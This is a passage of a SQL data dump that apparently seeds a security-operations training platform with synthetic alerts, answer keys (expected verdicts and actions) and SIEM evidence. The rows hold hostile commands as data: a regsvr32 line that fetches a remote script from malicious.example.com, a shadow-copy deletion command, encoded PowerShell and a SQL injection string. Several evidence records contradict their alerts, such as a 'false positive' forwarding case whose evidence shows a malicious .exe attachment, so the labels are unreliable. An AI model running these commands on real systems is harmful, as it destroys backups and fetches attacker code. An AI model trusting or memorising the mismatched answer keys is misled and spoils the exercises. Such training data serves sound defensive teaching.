machine.\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The connection to a known C2 server indicates a compromise and potential malware activity.\"}', 'Advanced', 'IR', 7, 1, 'RETAIL', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.849Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T15:42:31Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.140\\\",\\\"dst_ip\\\":\\\"203.0.113.102\\\",\\\"username\\\":\\\"malicious_user\\\",\\\"hostname\\\":\\\"infected-pc\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.849Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated 
event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T15:42:31Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.140\\\",\\\"dst_ip\\\":\\\"203.0.113.102\\\",\\\"username\\\":\\\"malicious_user\\\",\\\"hostname\\\":\\\"infected-pc\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.849Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T15:42:31Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.140\\\",\\\"dst_ip\\\":\\\"203.0.113.102\\\",\\\"username\\\":\\\"malicious_user\\\",\\\"hostname\\\":\\\"infected-pc\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.849Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T15:42:31Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.140\\\",\\\"dst_ip\\\":\\\"203.0.113.102\\\",\\\"username\\\":\\\"malicious_user\\\",\\\"hostname\\\":\\\"infected-pc\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.849Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T15:42:31Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.140\\\",\\\"dst_ip\\\":\\\"203.0.113.102\\\",\\\"username\\\":\\\"malicious_user\\\",\\\"hostname\\\":\\\"infected-pc\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1643, 'False Positive: Legitimate Email Forwarding Detected', 'low', 'Proofpoint', 'An email was forwarded to an external account, but investigation reveals it\'s an approved business practice.', 'Phishing', 'T1566', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T12:30:14Z\",\"event_type\":\"email_received\",\"src_ip\":\"192.168.1.150\",\"dst_ip\":\"\",\"username\":\"user@example.com\",\"hostname\":\"mail-server\",\"request_body\":\"\",\"command_line\":\"\",\"email_sender\":\"user@example.com\",\"url\":\"\"}', '2026-03-15 19:33:43', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"user@example.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"clean\",\"details\":\"Email forwarding is part of approved business workflow.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.150\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP of the mail server.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email forwarding activity is legitimate and part of regularly monitored business practices.\"}', 'Advanced', 'IR', 7, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"False Positive: Legitimate Email Forwarding Detected\",\"date\":\"2026-03-15T20:58:15.851Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1644, 'Malware Execution via Regsvr32', 'critical', 'Velociraptor', 'Regsvr32 was used to execute a remote script from a known malicious domain, indicating potential malware installation.', 'Malware', 'T1218', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T14:18:47Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.160\",\"dst_ip\":\"\",\"username\":\"compromised_user\",\"hostname\":\"infected-workstation\",\"request_body\":\"\",\"command_line\":\"regsvr32.exe /s /n /u /i:http://malicious.example.com/shell.sct scrobj.dll\"}', '2026-03-15 19:33:43', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"regsvr32.exe /s /n /u /i:http://malicious.example.com/shell.sct scrobj.dll\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Regsvr32 used to execute a script from a malicious domain.\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://malicious.example.com/shell.sct\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Malicious script hosted on this domain.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.1.160\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP of the compromised workstation.\"}}],\"expected_actions\":[\"block_url\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"Regsvr32 is being exploited to execute a remote script, indicative of malware installation.\"}', 'Advanced', 'IR', 7, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.852Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. 
Checksum mismatch.\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:18:47Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.160\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"hostname\\\":\\\"infected-workstation\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"regsvr32.exe /s /n /u /i:http://malicious.example.com/shell.sct scrobj.dll\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.852Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:18:47Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.160\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"hostname\\\":\\\"infected-workstation\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"regsvr32.exe /s /n /u /i:http://malicious.example.com/shell.sct scrobj.dll\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.852Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:18:47Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.160\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"hostname\\\":\\\"infected-workstation\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"regsvr32.exe /s /n /u /i:http://malicious.example.com/shell.sct scrobj.dll\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.852Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. 
[Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:18:47Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.160\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"hostname\\\":\\\"infected-workstation\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"regsvr32.exe /s /n /u /i:http://malicious.example.com/shell.sct scrobj.dll\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.852Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:18:47Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.160\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"hostname\\\":\\\"infected-workstation\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"regsvr32.exe /s /n /u /i:http://malicious.example.com/shell.sct scrobj.dll\\\"}\"}],\"query\":\"index=main source=\\\"/var/ossec/logs/alerts/alerts.json\\\" | head 100\"}}', 0),
(1645, 'Unusual File Deletion Pattern Detected', 'high', 'FTK', 'A large number of volume shadow copies were deleted, often seen in preparation for ransomware encryption.', 'Malware', 'T1490', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T17:10:05Z\",\"event_type\":\"file_deletion\",\"src_ip\":\"192.168.1.170\",\"dst_ip\":\"\",\"username\":\"malicious_actor\",\"hostname\":\"backup-server\",\"request_body\":\"\",\"command_line\":\"vssadmin delete shadows /all /quiet\"}', '2026-03-15 19:33:43', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"vssadmin delete shadows /all /quiet\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Command used to delete volume shadow copies in ransomware attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.170\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP of the server executing deletion.\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The deletion of volume shadow copies is a well-known precursor to ransomware encryption.\"}', 'Advanced', 'IR', 7, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.855Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T17:10:05Z\\\",\\\"event_type\\\":\\\"file_deletion\\\",\\\"src_ip\\\":\\\"192.168.1.170\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"malicious_actor\\\",\\\"hostname\\\":\\\"backup-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"vssadmin delete shadows /all 
/quiet\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.855Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T17:10:05Z\\\",\\\"event_type\\\":\\\"file_deletion\\\",\\\"src_ip\\\":\\\"192.168.1.170\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"malicious_actor\\\",\\\"hostname\\\":\\\"backup-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"vssadmin delete shadows /all /quiet\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.855Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T17:10:05Z\\\",\\\"event_type\\\":\\\"file_deletion\\\",\\\"src_ip\\\":\\\"192.168.1.170\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"malicious_actor\\\",\\\"hostname\\\":\\\"backup-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"vssadmin delete shadows /all /quiet\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.855Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T17:10:05Z\\\",\\\"event_type\\\":\\\"file_deletion\\\",\\\"src_ip\\\":\\\"192.168.1.170\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"malicious_actor\\\",\\\"hostname\\\":\\\"backup-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"vssadmin delete shadows /all /quiet\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.855Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T17:10:05Z\\\",\\\"event_type\\\":\\\"file_deletion\\\",\\\"src_ip\\\":\\\"192.168.1.170\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"malicious_actor\\\",\\\"hostname\\\":\\\"backup-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"vssadmin delete shadows /all /quiet\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1646, 'False Positive: High Network Utilization During Backup', 'low', 'Splunk', 'Increased network activity detected, coinciding with scheduled data backup operations, not malicious activity.', 'Data Exfil', 'T1020', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T20:00:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.180\",\"dst_ip\":\"203.0.113.250\",\"username\":\"backup_admin\",\"hostname\":\"backup-system\",\"request_body\":\"\",\"command_line\":\"\"}', '2026-03-15 19:33:43', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.250\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Trusted IP for remote storage during backups.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.180\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP of the backup system.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"Network activity is attributed to scheduled backups, not unauthorized data exfiltration.\"}', 'Advanced', 'IR', 7, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.858Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T20:00:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.180\\\",\\\"dst_ip\\\":\\\"203.0.113.250\\\",\\\"username\\\":\\\"backup_admin\\\",\\\"hostname\\\":\\\"backup-system\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.858Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T20:00:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.180\\\",\\\"dst_ip\\\":\\\"203.0.113.250\\\",\\\"username\\\":\\\"backup_admin\\\",\\\"hostname\\\":\\\"backup-system\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.858Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T20:00:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.180\\\",\\\"dst_ip\\\":\\\"203.0.113.250\\\",\\\"username\\\":\\\"backup_admin\\\",\\\"hostname\\\":\\\"backup-system\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.858Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T20:00:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.180\\\",\\\"dst_ip\\\":\\\"203.0.113.250\\\",\\\"username\\\":\\\"backup_admin\\\",\\\"hostname\\\":\\\"backup-system\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.858Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T20:00:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.180\\\",\\\"dst_ip\\\":\\\"203.0.113.250\\\",\\\"username\\\":\\\"backup_admin\\\",\\\"hostname\\\":\\\"backup-system\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1647, 'Encoded PowerShell Command Used in Reconnaissance', 'high', 'Velociraptor', 'A PowerShell command with encoded content was executed, potentially part of a reconnaissance phase before an attack.', 'Malware', 'T1082', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T18:35:47Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.190\",\"dst_ip\":\"\",\"username\":\"network_admin\",\"hostname\":\"control-server\",\"request_body\":\"\",\"command_line\":\"powershell.exe -enc JABkAGUAdABlAGMAdAAgAC0AcwB5AHMAdABlAG0A\"}', '2026-03-15 19:33:43', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"powershell.exe -enc JABkAGUAdABlAGMAdAAgAC0AcwB5AHMAdABlAG0A\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Encoded command used for system reconnaissance.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.190\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP of the control server.\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The encoded PowerShell command indicates potential reconnaissance activity, with intentions for further attacks.\"}', 'Advanced', 'IR', 7, 1, 'ENERGY', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.861Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T18:35:47Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.190\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"network_admin\\\",\\\"hostname\\\":\\\"control-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"powershell.exe -enc 
JABkAGUAdABlAGMAdAAgAC0AcwB5AHMAdABlAG0A\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.861Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T18:35:47Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.190\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"network_admin\\\",\\\"hostname\\\":\\\"control-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"powershell.exe -enc JABkAGUAdABlAGMAdAAgAC0AcwB5AHMAdABlAG0A\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.861Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T18:35:47Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.190\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"network_admin\\\",\\\"hostname\\\":\\\"control-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"powershell.exe -enc JABkAGUAdABlAGMAdAAgAC0AcwB5AHMAdABlAG0A\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.861Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T18:35:47Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.190\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"network_admin\\\",\\\"hostname\\\":\\\"control-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"powershell.exe -enc JABkAGUAdABlAGMAdAAgAC0AcwB5AHMAdABlAG0A\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.861Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T18:35:47Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.190\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"network_admin\\\",\\\"hostname\\\":\\\"control-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"powershell.exe -enc JABkAGUAdABlAGMAdAAgAC0AcwB5AHMAdABlAG0A\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1648, 'Password Spraying Detected Against Internal Web Portal', 'high', 'Splunk', 'Multiple failed login attempts detected from an external IP, indicating a potential password spraying attack targeting the internal web portal.', 'Brute Force', 'T1110', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T08:25:30Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"192.168.1.10\",\"username\":\"jdoe\",\"hostname\":\"web-portal\"}', '2026-03-15 19:36:10', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal network IP address\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Recognized internal user account\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"isolate_host\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The external IP has a history of brute force attempts, and multiple failed login attempts indicate a likely password spraying attack.\"}', 'Beginner', 'SIEM', 3, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.866Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 
203.0.113.55\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T08:25:30Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"web-portal\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.866Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T08:25:30Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"web-portal\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.866Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T08:25:30Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"web-portal\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.866Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T08:25:30Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"web-portal\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.866Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 